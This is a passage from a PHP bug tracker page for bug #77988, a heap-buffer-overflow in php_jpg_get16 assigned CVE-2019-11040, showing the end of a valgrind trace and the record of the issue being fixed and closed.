==29770==    by 0x652772: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==29770==    by 0x608DB7: execute_ex (zend_vm_execute.h:55334)
==29770==    by 0x608F0F: zend_execute (zend_vm_execute.h:60881)
==29770==    by 0x5C6A63: zend_execute_scripts (zend.c:1568)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770== 
==29770== 
==29770== HEAP SUMMARY:
==29770==     in use at exit: 0 bytes in 0 blocks
==29770==   total heap usage: 7,157 allocs, 7,157 frees, 1,606,143 bytes allocated
==29770== 
==29770== All heap blocks were freed -- no leaks are possible
==29770== 
==29770== For counts of detected and suppressed errors, rerun with: -v
==29770== Use --track-origins=yes to see where uninitialised values come from
==29770== ERROR SUMMARY: 170 errors from 22 contexts (suppressed: 0 from 0)


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-28 00:18 UTC] stas@php.net
-PHP Version: 7.3.5 +PHP Version: 7.1.29 -CVE-ID: +CVE-ID: 2019-11040
 [2019-05-28 00:28 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2019-05-28 00:28 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=73ff4193be24192c894dc0502d06e2b2db35eefb
Log: Fix bug #77988 - heap-buffer-overflow on php_jpg_get16
 [2019-05-28 00:28 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2019-05-28 07:07 UTC] cmb@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b7dc3d9039335b2bfaa1f4ade5d38aec89f25922
Log: Fix bug #77988 - heap-buffer-overflow on php_jpg_get16
 [2019-07-27 15:13 UTC] orestiskourides+php at gmail dot com
-: orestiskourides at gmail dot com +: orestiskourides+php at gmail dot com
 [2019-07-27 15:13 UTC] orestiskourides+php at gmail dot com
email
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Tue Aug 20 13:01:27 2019 UTC